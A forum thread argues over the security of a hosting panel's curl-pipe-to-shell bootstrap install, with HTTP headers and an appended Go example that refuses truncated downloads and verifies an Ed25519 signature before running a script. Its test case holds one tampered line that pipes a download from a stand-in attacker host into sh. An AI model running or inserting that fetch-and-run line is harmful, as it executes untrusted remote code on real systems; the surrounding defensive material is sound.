jre
Sep 2, 2011

To the cloud ?





nem posted:

Sure. That's why the source is on Github. You can wget and invoke from shell if that's your thing too.

Or you could put a tiny bit more effort in and publish signed packages and not have an embarrassingly insecure install method for a product with "integrated security"?


nem
Jan 4, 2003

Managed + self-hosted hosting platforms since 2002.


jre posted:

Or you could put a tiny bit more effort in and publish signed packages and not have an embarrassingly insecure install method for a product with "integrated security"?

SHA2 is on apisnetworks.com if you need that. It's for a pristine server. You can always pull the repos and inspect history if necessary. You still have control over it and the expectation is that you'll wipe it after benchmarking. All source is publicly available through the script + Bitbucket repos. Submit a PR if you'd like to improve it. It's still pre-alpha. This script is the most rudimentary step of the entire process. All RPMs are signed. Source code is not signed yet, because it's still before 3.0.

I can sign it with whatever key, but that does not mean it is secure unless you trust the signing source, which puts us at an impasse.

jre
Sep 2, 2011

To the cloud ?





nem posted:

SHA2 is on apisnetworks.com if you need that. It's for a pristine server. You can always pull the repos and inspect history if necessary. You still have control over it and the expectation is that you'll wipe it after benchmarking. All source is publicly available through the script + Bitbucket repos. Submit a PR if you'd like to improve it. It's still pre-alpha. This script is the most rudimentary step of the entire process. All RPMs are signed. Source code is not signed yet, because it's still before 3.0.

I can sign it with whatever key, but that does not mean it is secure unless you trust the signing source, which puts us at an impasse.

So even ignoring fun tricks like this https://www.idontplaydarts.com/2016...sh-server-side/

There's a fundamental difference in security between having a package signed with a private key that you keep safely offline, and a random script on GitHub which you only need to obtain push permissions to compromise. People regularly accidentally leak GitHub API keys because it's an easy thing to do in integrations. It happened to Homebrew recently.

Saying people can manually check the hash or audit the code every time they go to run the script to check it's not been compromised is silly.

nem
Jan 4, 2003

Managed + self-hosted hosting platforms since 2002.



This example appears to work for chunked encoding only...

code:
# curl -I https://raw.githubusercontent.com/apisnetworks/apnscp-bootstrapper/master/bootstrap.sh

HTTP/1.1 200 OK
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
ETag: "cbc17bdc7fea3ebee66d718d9b7ec5e2c0621c9e"
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
X-Geo-Block-List:
X-GitHub-Request-Id: CC46:4984:9D0AF:A5913:5B720AF2
Content-Length: 4674
Accept-Ranges: bytes
Date: Mon, 13 Aug 2018 22:49:23 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-msp9220-MSP
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1534200564.590134,VS0,VE30
Vary: Authorization,Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 5d1766d1abc8b92d22d005bbe9fac3b7d6b23661
Expires: Mon, 13 Aug 2018 22:54:23 GMT
Source-Age: 0
Downloaded the example from the blog. Reproduced so long as the server sends chunked encoding, but Github doesn't chunk its encoding for small files so you can't stuff the stream with arbitrary code. Neat hypothetical nonetheless and something to consider going forward with how data is sent over the panel.

Compromised? Sure, anyone can get compromised. Unless there are two separate processes for pushing code and signing releases, compromising one most likely implies the second is compromised.

MITM? Possible, but then you'd have bigger problems with all of Github. I've open-sourced some components and put them on Github/Bitbucket for that very reason. Right now, with multiple releases pushed daily, it's important to get to a milestone that I can tag and freeze the release, then sign these milestones. I'm still a few months from a final release and am interested in collecting usage data at this point, which again is why I asked if they had 90 minutes to burn and wipe after running.

All advice is helpful when it becomes relevant for that particular milestone.
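Added example (editor's code, not apnscp's bootstrapper and not the code from the linked blog post) tying together the two technical points in this exchange: jre's, that a release signed with a key kept offline is a different trust model from a script (or a checksum file) living under the same push access, and nem's, that the stream-stuffing trick needs chunked transfer encoding and a client that executes bytes as they arrive. The client below refuses to hand anything to an interpreter until the whole body has arrived, then checks a detached Ed25519 signature against a pinned public key. Go is used because its standard library carries both Ed25519 and an HTTP/1.1 response parser, so it runs offline. The script text, the fixed key seed, the chunk size and the raw chunked responses are all constructed for the demo; it does not reproduce the server-side timing detection from the linked article.

```go
package main

import (
	"bufio"
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"net/http"
)

// Constructed stand-in for the bootstrap script; not the real bootstrap.sh.
var sampleScript = []byte("#!/bin/sh\nset -e\necho 'installing panel'\n")

// Key derived from a fixed seed so the example is reproducible (assumption
// for the demo). In a real release process the private half stays offline
// with the maintainer; only the public half is pinned in the verifier.
var maintainerKey = ed25519.NewKeyFromSeed(bytes.Repeat([]byte{0x42}, ed25519.SeedSize))
var pinnedPub = maintainerKey.Public().(ed25519.PublicKey)

// SignInstaller is the release-time step: sign the exact bytes to be served.
func SignInstaller(priv ed25519.PrivateKey, script []byte) []byte {
	return ed25519.Sign(priv, script)
}

// SHA256Hex is the checksum route mentioned in the thread. It only helps if
// the digest comes from somewhere the attacker cannot also edit; a digest
// committed next to the script falls with the same push access.
func SHA256Hex(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// ChunkedResponse builds a raw HTTP/1.1 response with Transfer-Encoding:
// chunked, the case the linked trick depends on. complete=false omits the
// terminating zero-length chunk, simulating a stream cut off mid-transfer.
func ChunkedResponse(body []byte, chunkSize int, complete bool) []byte {
	var b bytes.Buffer
	b.WriteString("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nTransfer-Encoding: chunked\r\n\r\n")
	for len(body) > 0 {
		n := chunkSize
		if n > len(body) {
			n = len(body)
		}
		fmt.Fprintf(&b, "%x\r\n", n)
		b.Write(body[:n])
		b.WriteString("\r\n")
		body = body[n:]
	}
	if complete {
		b.WriteString("0\r\n\r\n")
	}
	return b.Bytes()
}

// ReadCompleteBody parses a raw response and returns the body only once all
// of it has arrived. `curl | sh` executes lines as they land; here a
// truncated chunked stream surfaces as io.ErrUnexpectedEOF and nothing runs.
func ReadCompleteBody(raw []byte) ([]byte, error) {
	resp, err := http.ReadResponse(bufio.NewReader(bytes.NewReader(raw)), nil)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("unexpected status %q", resp.Status)
	}
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return nil, fmt.Errorf("incomplete download, refusing partial script: %w", err)
	}
	return body, nil
}

// FetchVerifiedInstaller returns the script only if it arrived complete and
// its detached signature verifies under the pinned public key.
func FetchVerifiedInstaller(pub ed25519.PublicKey, raw, sig []byte) ([]byte, error) {
	script, err := ReadCompleteBody(raw)
	if err != nil {
		return nil, err
	}
	if !ed25519.Verify(pub, script, sig) {
		return nil, errors.New("signature does not match pinned maintainer key, refusing to run")
	}
	return script, nil
}

func main() {
	sig := SignInstaller(maintainerKey, sampleScript)
	tampered := append(append([]byte{}, sampleScript...), "curl http://attacker.invalid/x | sh\n"...)
	cases := map[string][]byte{
		"complete, signed": ChunkedResponse(sampleScript, 7, true),
		"truncated stream": ChunkedResponse(sampleScript, 7, false),
		"tampered body":    ChunkedResponse(tampered, 7, true),
	}
	for name, raw := range cases {
		_, err := FetchVerifiedInstaller(pinnedPub, raw, sig)
		fmt.Printf("%-17s -> err=%v\n", name, err)
	}
	fmt.Println("pinned sha256 of script:", SHA256Hex(sampleScript))
}
```

Only the "complete, signed" case yields a script; the truncated stream is rejected before any signature check, and the tampered body fails the signature even though it was delivered completely. Swapping `SHA256Hex` in for the signature check would give the same result for this tamper, but only as long as the pinned digest is held somewhere the attacker's push access does not reach.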
